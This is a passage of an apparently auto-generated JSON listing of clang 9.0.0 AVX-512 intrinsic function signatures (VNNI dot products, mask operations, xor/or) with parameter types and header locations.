"_mm512_maskz_dpbusd_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vnniintrin.h:37:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__S", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_dpbusds_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vnniintrin.h:45:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__S", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_dpbusds_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vnniintrin.h:52:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__S", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_dpbusds_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vnniintrin.h:60:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__S", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_dpwssd_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vnniintrin.h:68:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__S", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_dpwssd_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vnniintrin.h:75:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__S", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_dpwssd_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vnniintrin.h:83:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__S", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_dpwssds_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vnniintrin.h:91:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__S", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_dpwssds_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vnniintrin.h:98:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__S", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_dpwssds_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vnniintrin.h:106:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__S", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm256_dpbusd_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvnniintrin.h:23:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__S", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_dpbusd_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvnniintrin.h:30:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__S", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_dpbusd_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvnniintrin.h:38:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__S", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_dpbusds_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvnniintrin.h:46:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__S", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_dpbusds_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvnniintrin.h:53:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__S", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_dpbusds_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvnniintrin.h:61:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__S", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_dpwssd_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvnniintrin.h:69:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__S", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_dpwssd_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvnniintrin.h:76:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__S", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_dpwssd_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvnniintrin.h:84:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__S", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_dpwssds_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvnniintrin.h:92:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__S", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_dpwssds_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvnniintrin.h:99:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__S", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_dpwssds_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvnniintrin.h:107:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__S", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_dpbusd_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvnniintrin.h:115:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__S", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_dpbusd_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvnniintrin.h:122:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__S", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_dpbusd_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvnniintrin.h:130:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__S", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_dpbusds_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvnniintrin.h:138:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__S", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_dpbusds_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvnniintrin.h:145:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__S", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_dpbusds_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvnniintrin.h:153:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__S", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_dpwssd_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvnniintrin.h:161:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__S", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_dpwssd_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvnniintrin.h:168:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__S", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_dpwssd_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvnniintrin.h:176:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__S", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_dpwssds_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvnniintrin.h:184:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__S", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_dpwssds_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvnniintrin.h:191:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__S", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_dpwssds_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvnniintrin.h:199:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__S", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_knot_mask8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:22:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__mmask8" } }, { "tag": "function", "name": "_kand_mask8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:28:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__mmask8" } }, { "tag": "function", "name": "_kandn_mask8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:34:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__mmask8" } }, { "tag": "function", "name": "_kor_mask8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:40:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__mmask8" } }, { "tag": "function", "name": "_kxnor_mask8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:46:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__mmask8" } }, { "tag": "function", "name": "_kxor_mask8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:52:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__mmask8" } }, { "tag": "function", "name": "_kortestc_mask8_u8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:58:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask8" } }], "return-type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "function", "name": "_kortestz_mask8_u8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:64:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask8" } }], "return-type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "function", "name": "_kortest_mask8_u8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:70:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__C", "type": { "tag": ":pointer", "type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "function", "name": "_ktestc_mask8_u8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:76:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask8" } }], "return-type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "function", "name": "_ktestz_mask8_u8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:82:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask8" } }], "return-type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "function", "name": "_ktest_mask8_u8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:88:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__C", "type": { "tag": ":pointer", "type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "function", "name": "_ktestc_mask16_u8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:94:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask16" } }], "return-type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "function", "name": "_ktestz_mask16_u8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:100:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask16" } }], "return-type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "function", "name": "_ktest_mask16_u8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:106:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__C", "type": { "tag": ":pointer", "type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "function", "name": "_kadd_mask8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:112:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__mmask8" } }, { "tag": "function", "name": "_kadd_mask16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:118:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask16" } }], "return-type": { "tag": "__mmask16" } }, { "tag": "function", "name": "_cvtmask8_u32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:130:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask8" } }], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_cvtu32_mask8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:135:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__mmask8" } }, { "tag": "function", "name": "_load_mask8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:140:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": ":pointer", "type": { "tag": "__mmask8" } } }], "return-type": { "tag": "__mmask8" } }, { "tag": "function", "name": "_store_mask8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:145:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": ":pointer", "type": { "tag": "__mmask8" } } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask8" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_mullo_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:150:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_mullo_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:155:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_mullo_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:162:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_xor_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:169:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask_xor_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:174:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_maskz_xor_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:181:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_xor_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:188:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mask_xor_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:193:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_maskz_xor_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:200:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_or_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:207:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask_or_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:212:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512d" } }, { "tag": "parameter", 